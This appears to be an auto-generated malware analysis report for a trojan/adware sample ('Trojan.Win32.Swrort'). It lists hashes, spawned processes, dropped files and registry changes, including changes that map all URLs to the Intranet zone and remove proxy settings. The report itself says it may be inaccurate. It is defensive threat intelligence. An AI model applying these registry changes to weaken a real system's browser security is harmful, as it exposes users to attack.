Trojan.Win32.Swrort.3_eb4a1216ea

by malwarelabrobot on December 11th, 2015 in Malware Descriptions.

Adware.Agent.QCF (B) (Emsisoft), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: eb4a1216ea797f8bde4485f7b0580c8e
SHA1: 6a713ff3bdcdc151795c1e78fc49b0e6f5e0bcf9
SHA256: 007c79d7b1b904520a21d541ddccddb90fe37d2eef4a767512b3273372f98ad8
SSDeep: 49152:bbW/0oVqkt1lJcWbZdlIeKt3mFz6zBEd6uIcc:bbW/tEWFLolEd6uxc
Size: 2165862 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-10 18:00:27
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

msconfig.exe:656
%original file name%.exe:228
irsetup.exe:188
irsetup.exe:1668
chromeupdate.exe:1820

The Trojan injects its code into the following process(es):

MediaPlayer__15159_il35679.exe:1884

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process MediaPlayer__15159_il35679.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process irsetup.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IRW2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

The process irsetup.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
%Program Files%\Your Product\lua5.1.dll (2902 bytes)
%Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe (12280 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
%Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Program Files%\Your Product\uninstall.exe (9213 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
%Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (0 bytes)
%Program Files%\Your Product\Uninstall\uni3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)

The process chromeupdate.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

Registry activity

The process msconfig.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 27 9F F6 F6 93 CA 7A D9 D9 71 4D D7 FB 8A 67"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

The process MediaPlayer__15159_il35679.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\cousins.epoxied.1]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\cousins.epoxied.1\CLSID]
"(Default)" = "{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\VersionIndependentProgID]
"(Default)" = "cousins.epoxied"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\cousins.epoxied]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\TypeLib]
"(Default)" = "{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\cousins.epoxied\CurVer]
"(Default)" = "cousins.epoxied.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level" = ""

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1449692446"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A EE 8F 0A 84 D8 F6 46 51 DB B6 5D E1 92 43 BF"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\TypeLib]
"(Default)" = "{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MediaPlayer__15159_il35679.exe"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\ProgID]
"(Default)" = "cousins.epoxied.1"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\TypeLib\{0FA5E38B-EB27-4A51-AA61-A0BAF2BFC090}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}]
"(Default)" = "Inst Class"

[HKCR\Interface\{BA588642-35E1-49C9-8486-1DC2B2EB99F1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MediaPlayer__15159_il35679\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 24 A9 41 8C B4 D6 53 9D DA A4 48 EF A1 7A CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process irsetup.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 61 5A FB E4 3A A8 3F 65 D9 1D 76 7D 33 AD 77"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process irsetup.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"HelpLink" = "http://www.yourcompany.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

